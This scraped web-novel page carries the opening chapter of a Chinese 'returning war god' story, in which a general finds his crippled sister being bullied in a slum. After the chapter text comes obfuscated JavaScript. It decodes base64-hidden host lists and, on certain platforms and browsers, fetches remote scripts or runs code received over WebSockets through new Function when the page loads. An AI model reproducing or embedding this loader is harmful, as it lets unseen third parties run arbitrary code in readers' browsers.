笔趣阁

字:
关灯 护眼
笔趣阁 > 徐逸徐牧天 > 第一章 我回来了!

第一章 我回来了!

章节错误,点此举报(免注册),举报后维护人员会在两分钟内校正章节内容,请耐心等待,并刷新页面。
巴山郡,贫民窟。
  残阳似血,晚霞余晖照耀在徐逸身上,冰冷得没有一丝温度。
  他手里捏着一张照片,对比不远处那残破民居前,坐在轮椅上望天的女孩。
  “确定是她?真的是我妹妹,徐灵?”声音如刀,却潜藏难以被人察觉的慌乱。
  在他身后,一道清冷窈窕身影,戎装染血,低语回答:“红叶确定。”
  徐逸拿着照片的手,抑制不住的在颤抖。
  十六岁从戎,二十二岁于夜狼关拜帅,二十五岁即将封王的天龙第一战神,此时此刻,他的手在抖!
  红叶杀意蓬勃而出:“属下现在便去,屠尽赵钱孙李周五家,将八百人头呈上!”
  “不急。”徐逸面无表情的抬手,一滴滚烫鲜血从他掌心落下。
  红叶低头,杀意尽收。
  指甲嵌入了掌心,徐逸却不觉得有丝毫疼痛。
  他仔细看着照片,又看着那轮椅上的女孩,依稀看出了昔日的轮廓。
  身躯瘦弱,面容苍白,长发如杂草,沾染着死寂的枯黄。
  本该清澈动人的双眸,麻木、空洞。
  她虽还活着,可除却呼吸,与死人无异。
  “哥,人家走累啦,背背我嘛好不好?”
  “哥,你觉得这条裙子好看,还是这条?不要不要!我才不穿背背裤,丑死了!”
  “哇……哥,我好伤心,我门牙掉了,说话漏风……你还笑?恨死你啦!”
  昔日点滴似在眼前。
  徐逸就这样站着。
  钢枪为骨、脊梁作山的站着。
  谁也读不出他此刻的内心,到底在想些什么。
  嘎吱……
  在徐逸准备迈步上前时,紧闭的木门打开,一个穿着粗布麻衣的青年,端着水杯走了出来。
  他消瘦而落寞,看向轮椅上女孩的双眼,却透着无尽柔情。
  “小铃铛,该吃药了。”
  哐当……
  一群人由远及近,随意的踢着脚下的金属盒子,发出刺耳声响,打破了寂静。
  “一个病鬼,一个残废,哈哈,对,该吃药了,药不能停啊。”染着黄发,脖子上挂一根粗大金链的男人戏谑着。
  “哈哈哈……”一群人,猖狂大笑。
  青年死死咬牙,护在徐灵身前:“你们又想怎么样?”
  黄发男人突然一脸惊恐,双手抱拳,朝青年弯腰:“哎哟,汪不仁,汪大少,对不住对不住,小的有眼不识泰山,不知道是您在这,冒犯了您,为了表示歉意……”
  啪!
  黄发男人正说着,猛的一巴掌扇在汪不仁消瘦泛黄的脸颊上。
  汪不仁趔趄几步,手中水杯没能捏住,掉在地上摔得粉碎。
  原本水杯中的温水,溅在徐灵干净的破洞帆布鞋上。
  她的双眼,依旧涣散而空洞。
  仿佛发生任何事情,都不足以引起她半分注意。
  “你还真以为你是曾经的汪家大少啊?狗东西!老子没事就喜欢欺负你,你能拿我怎样?”
  黄发男人一脚将汪不仁踹翻,朝他吐一口浓痰,脸上便浮现出变态般的快感。
  他至始至终都是一个上不了台面的小混混,但却能够将曾经高不可攀的汪家大少踩在脚底,肆意羞辱。
  这难道还不值得高兴么?
  汪不仁倒在地上,痛苦的捂着肚子,他双眼遍布血丝,他愤怒得想要毁灭这世界。
  但!
『加入书签,方便阅读』
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzk5OTk5OS0xMDA4NQ==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x4d\x4a\x52\x5a\x74\x53\x42\x70\x63\x77']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=1000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,300000),ext='2',i='ndx'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9vYWpmMmpkajlmajI5LmJiZGlhbbnppc2h1LmNvbbQ==','d3NzOOi8vd3MuYW5kYTE1MTYuY29tOOjkwOOTAsd3NzOOi8vd3Muc3luZ2d5LmNvbTo5MDkwLHdzczovL3dzLnpoaXB1ZnMuY29tOOjkwOOTA=',window,document,['b','O']);}:function(){};